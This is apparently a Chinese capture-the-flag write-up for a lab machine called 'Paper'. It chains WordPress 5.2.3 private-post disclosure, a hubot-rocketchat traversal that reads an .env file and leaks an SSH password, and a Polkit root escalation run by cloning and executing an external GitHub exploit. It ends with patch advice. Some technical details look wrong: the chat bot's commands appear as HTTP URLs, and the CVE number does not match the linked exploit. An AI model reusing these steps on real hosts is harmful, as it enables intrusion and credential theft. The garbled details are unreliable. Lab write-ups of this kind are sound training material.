[Meachines] [Easy] Paper Wordpress 5.2.3未授权访问+hubot-rocketchat LFI+Polkit权限提升
字数 1167 2025-08-22 12:23:36
WordPress 5.2.3未授权访问 + hubot-rocketchat LFI + Polkit权限提升综合渗透测试报告
1. 信息收集
1.1 目标识别
- IP地址: 10.10.11.143
- 开放端口:
- 22/tcp (SSH - OpenSSH 8.0)
- 80/tcp (HTTP - Apache 2.4.37)
- 443/tcp (HTTPS - Apache 2.4.37)
1.2 Web服务识别
- Web服务器: Apache/2.4.37 (CentOS) with OpenSSL/1.1.1k, mod_fcgid/2.3.9
- WordPress版本: 5.2.3
- 域名发现:
- office.paper
- chat.office.paper
2. 漏洞利用路径
2.1 WordPress 5.2.3未授权访问漏洞
漏洞描述: WordPress 5.2.3存在未授权访问漏洞,允许攻击者查看私有内容。
利用步骤:
- 访问目标网站:
http://office.paper/ - 添加hosts记录:
echo '10.10.11.143 office.paper' >> /etc/hosts - 使用未授权访问参数:
curl 'http://office.paper/?static=1' - 发现隐藏的子域名:
chat.office.paperecho '10.10.11.143 chat.office.paper' >> /etc/hosts
2.2 hubot-rocketchat本地文件包含(LFI)漏洞
漏洞描述: hubot-rocketchat存在本地文件包含漏洞,可读取服务器上的任意文件。
利用步骤:
- 访问发现的子域名:
http://chat.office.paper/ - 利用LFI漏洞读取敏感文件:
curl 'http://chat.office.paper/list' # 列出当前目录 curl 'http://chat.office.paper/list../' # 列出上级目录 curl 'http://chat.office.paper/file../hubot/.env' # 读取.env文件 - 获取到凭证:
username: recyclops password: Queenofblad3s!23
2.3 SSH登录
- 使用获取的凭证通过SSH登录:
ssh recyclops@10.10.11.143 - 获取user flag:
5f02c513c06b2e212e3433c1a09e5103
3. 权限提升(Polkit漏洞)
3.1 Polkit漏洞利用
漏洞描述: Polkit (CVE-2021-4034)是一个权限提升漏洞,允许低权限用户获得root权限。
利用步骤:
- 下载漏洞利用代码:
git clone https://github.com/Almorabea/Polkit-exploit - 编译并执行漏洞利用:
cd Polkit-exploit make ./exploit - 成功获取root权限后读取root flag:
97ae0f9636f32f353b018406349c97ad
4. 漏洞修复建议
4.1 WordPress修复
- 立即升级WordPress到最新版本
- 禁用未授权访问功能或实施适当的访问控制
4.2 hubot-rocketchat修复
- 升级hubot-rocketchat到最新版本
- 实施输入验证,防止路径遍历攻击
- 将敏感文件(如.env)移出web可访问目录
4.3 Polkit修复
- 应用最新的安全补丁
- 升级系统软件包:
yum update polkit -y
5. 总结
本次渗透测试通过以下路径成功获取系统最高权限:
- 利用WordPress 5.2.3未授权访问漏洞发现隐藏子域名
- 通过hubot-rocketchat的LFI漏洞获取SSH凭证
- 使用获取的凭证登录系统
- 利用Polkit漏洞提升至root权限
建议系统管理员立即修复上述漏洞,并定期进行安全审计。